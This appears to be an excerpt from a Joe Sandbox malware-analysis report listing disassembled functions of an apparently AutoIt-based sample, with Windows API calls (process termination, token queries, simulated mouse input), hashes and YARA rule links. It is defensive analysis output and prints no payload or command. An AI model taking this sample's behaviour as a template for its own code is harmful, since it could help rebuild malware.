                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: 189408e408c29c40a3baf197059af649e2ba2a8a37c874ccd9d2c1a70e9f5fa0
                                                      • Instruction ID: b1cfd3b51fec51467a5968471bfcf42e789d70fd9b259dd3f82f5db99520e13e
                                                      • Opcode Fuzzy Hash: 189408e408c29c40a3baf197059af649e2ba2a8a37c874ccd9d2c1a70e9f5fa0
                                                      • Instruction Fuzzy Hash: D8418D70100601AFDB10DF28CC88FA67BF8FB59764F044639FAA4C61A2D730A945DB62
                                                      Function 0088B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(008C57B0,00000000), ref: 0088B712
                                                      • EnableWindow.USER32(00000000,00000000), ref: 0088B736
                                                      • ShowWindow.USER32(008C57B0,00000000), ref: 0088B796
                                                      • ShowWindow.USER32(00000000,00000004), ref: 0088B7A8
                                                      • EnableWindow.USER32(00000000,00000001), ref: 0088B7CC
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0088B7EF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 1a4cf643dcbccf82e6d978f991ea5e788cb79434f1297075c830f5e7e468c595
                                                      • Instruction ID: 8d5ec4ccfd939dc66e151ae60b0a8ec345e415307e7bcc40a63959ac97133d56
                                                      • Opcode Fuzzy Hash: 1a4cf643dcbccf82e6d978f991ea5e788cb79434f1297075c830f5e7e468c595
                                                      • Instruction Fuzzy Hash: 87415134600241AFDB25EF28C499B957BE1FF89310F5881B9FA58CF6A3C731A856CB51
                                                      Function 0087709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 008770AC
                                                        • Part of subcall function 008739A0: GetWindowRect.USER32(?,?), ref: 008739B3
                                                      • GetDesktopWindow.USER32 ref: 008770D6
                                                      • GetWindowRect.USER32(00000000), ref: 008770DD
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0087710F
                                                        • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                      • GetCursorPos.USER32(?), ref: 0087713B
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00877199
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: 031839dae328c5b7d912e8c28abaca73f047512737f396cfe44fbb1b11a838e4
                                                      • Instruction ID: 8e78bbcd8ac83b335e3d76a1f10075960a948b8757a9663daef0a52b836b6f6e
                                                      • Opcode Fuzzy Hash: 031839dae328c5b7d912e8c28abaca73f047512737f396cfe44fbb1b11a838e4
                                                      • Instruction Fuzzy Hash: 6131B272609305ABD720DF18D849F9BB7A9FF89314F004919F589D7192DB70EA09CBA2
                                                      Function 0086EB23 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                        • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                      • _wcstok.LIBCMT ref: 0086EC94
                                                      • _wcscpy.LIBCMT ref: 0086ED23
                                                      • _memset.LIBCMT ref: 0086ED56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 0709673eb5c89325b65d52df120ed16c45c0b7157940ecf87e1a25a8fd0d0fb1
                                                      • Instruction ID: fe4cab7fbc9b5daa5a23f585bf7a7e9efd347b948455c319cd1343d4eddbabb4
                                                      • Opcode Fuzzy Hash: 0709673eb5c89325b65d52df120ed16c45c0b7157940ecf87e1a25a8fd0d0fb1
                                                      • Instruction Fuzzy Hash: 63C139755083509FC764EF28D881A5AB7E4FF85324F01892DF999DB2A2DB30EC45CB92
                                                      Function 00858879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008580C0
                                                        • Part of subcall function 008580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008580CA
                                                        • Part of subcall function 008580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008580D9
                                                        • Part of subcall function 008580A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008580E0
                                                        • Part of subcall function 008580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008580F6
                                                      • GetLengthSid.ADVAPI32(?,00000000,0085842F), ref: 008588CA
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008588D6
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008588DD
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 008588F6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0085842F), ref: 0085890A
                                                      • HeapFree.KERNEL32(00000000), ref: 00858911
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 169236558-0
                                                      • Opcode ID: 4afb6d35eb34933976bff40d27739793f9c45ae8d2d111cc04f1c1550b1399b5
                                                      • Instruction ID: 39be1fe8471b41b7dfc0960b99fd7edbd15a063c0e3d1ec9d2b1e5bc002a3a0a
                                                      • Opcode Fuzzy Hash: 4afb6d35eb34933976bff40d27739793f9c45ae8d2d111cc04f1c1550b1399b5
                                                      • Instruction Fuzzy Hash: EB11B135501609FFDB119FA8DC09BBEBB68FB44316F10402AE945E7211CB32AD18DB61
                                                      Function 0085B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0085B7B5
                                                      • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 0085B7C6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 0085B7CD
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0085B7D5
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0085B7EC
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0085B7FE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 25e0d0654c8430f5c0931097c97f3749d11e5a945623824da8340c3695c358c6
                                                      • Instruction ID: 6442b7d2a48d580212758c71da5f3923ff55a608d8c4d2dcd23e4162c665198b
                                                      • Opcode Fuzzy Hash: 25e0d0654c8430f5c0931097c97f3749d11e5a945623824da8340c3695c358c6
                                                      • Instruction Fuzzy Hash: 36017175A00209BBEF109BAA9C49A5ABFA8FB58311F004065FE04E7292D6309C10CF91
                                                      Function 00820162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00820193
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 0082019B
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008201A6
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008201B1
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 008201B9
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008201C1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: c3d95861d519c56fcb0adcc9d505645c79b7a00abb8f7d0bb4ec79de27f4a350
                                                      • Instruction ID: b6771515a5d4a3c2d016f24d76b93469400217cc331522ccc2dc1ded1ebac143
                                                      • Opcode Fuzzy Hash: c3d95861d519c56fcb0adcc9d505645c79b7a00abb8f7d0bb4ec79de27f4a350
                                                      • Instruction Fuzzy Hash: 3C016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87942C7F5A864CBE5
                                                      Function 008653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008653F9
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0086540F
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0086541E
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0086542D
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00865437
                                                      • CloseHandle.KERNEL32(00000000), ref: 0086543E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 2fee82f626a32d78c0ffb538c3b0c2adda3926d2a9de32d4cfabfc97ac965d3b
                                                      • Instruction ID: 98fec5de8a4008cef508c3fc84d7510ac9d9d8653cdaf2f9ddf3a98a4ceb1470
                                                      • Opcode Fuzzy Hash: 2fee82f626a32d78c0ffb538c3b0c2adda3926d2a9de32d4cfabfc97ac965d3b
                                                      • Instruction Fuzzy Hash: A5F06D32240158BBE3215BA6DC0DEAB7A7CFFCAB11F000269FA04D1052EAA01A0187B5
                                                      Function 00867230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?,?,?,?,00845D3D,?,?,?,?,00810EE4,?,?), ref: 00867243
                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00867254
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00810EE4,?,?), ref: 00867261
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0086726E
                                                        • Part of subcall function 00866C35: CloseHandle.KERNEL32(00000000), ref: 00866C3F
                                                      • InterlockedExchange.KERNEL32(?,000001F6,?,00810EE4,?,?), ref: 00867281
                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 00867288
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: e73af80c77e745919fdee4ef2b324598bde6f037f27e6417d1a660c11b5f232a
                                                      • Instruction ID: 4056635101cf3ab6fcabda0426f57418f0d0dfb2df4106208096979a7513a903
                                                      • Opcode Fuzzy Hash: e73af80c77e745919fdee4ef2b324598bde6f037f27e6417d1a660c11b5f232a
                                                      • Instruction Fuzzy Hash: A3F0823A540612EBE7121B68ED4C9DB773AFF45702B110531F703E50A2DB7A6811CB50
                                                      Function 008785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00878613
                                                      • CharUpperBuffW.USER32(?,?), ref: 00878722
                                                      • VariantClear.OLEAUT32(?), ref: 0087889A
                                                        • Part of subcall function 00867562: VariantInit.OLEAUT32(00000000), ref: 008675A2
                                                        • Part of subcall function 00867562: VariantCopy.OLEAUT32(00000000,?), ref: 008675AB
                                                        • Part of subcall function 00867562: VariantClear.OLEAUT32(00000000), ref: 008675B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: 747f028c454f71a65b49f1f29b56132636bc987e8cf21b9b055a441ac2f916b2
                                                      • Instruction ID: de6df456ddd0745e6b67cc792e12b22feedb6be9b52f99f9c1f9a3b79b5842d5
                                                      • Opcode Fuzzy Hash: 747f028c454f71a65b49f1f29b56132636bc987e8cf21b9b055a441ac2f916b2
                                                      • Instruction Fuzzy Hash: 8A912770604305DFC710DF28C88995ABBE4FB89714F14896EF99ACB3A2DB30E945CB52
                                                      Function 00862A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                      • _memset.LIBCMT ref: 00862B87
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00862BB6
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00862C69
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00862C97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: 74a675a5f56d07a7f720465d1df5577f4052fd91d5f1173f888cc91ba98954d5
                                                      • Instruction ID: 19428ade184248846eb91714aeb07b9039d9805b8e9a9aeb02eb043adc1d07a0
                                                      • Opcode Fuzzy Hash: 74a675a5f56d07a7f720465d1df5577f4052fd91d5f1173f888cc91ba98954d5
                                                      • Instruction Fuzzy Hash: 0651EE71208B119FC7249F28D845A6FB7E8FF98320F050AADF890D6291DB70CC44CB92
                                                      Function 0085D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0085D5D4
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0085D60A
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 0085D61B
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0085D69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 79268f45084a2209f4bd68e7d3836f10a1bcd71b7060d316bd264e35cd16a346
                                                      • Instruction ID: 90b56dd6f894436b174f904f53b3632aea491594d0b2b8411a4fa6bbc50ab667
                                                      • Opcode Fuzzy Hash: 79268f45084a2209f4bd68e7d3836f10a1bcd71b7060d316bd264e35cd16a346
                                                      • Instruction Fuzzy Hash: 21419CB1600305EFDB25DF64C884A9A7BE9FF58316F1580A9AD09DF206D7B0D949CBE0
                                                      Function 00862753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 008627C0
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008627DC
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00862822
                                                      • DeleteMenu.USER32(?,00000000,00000000), ref: 0086286B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
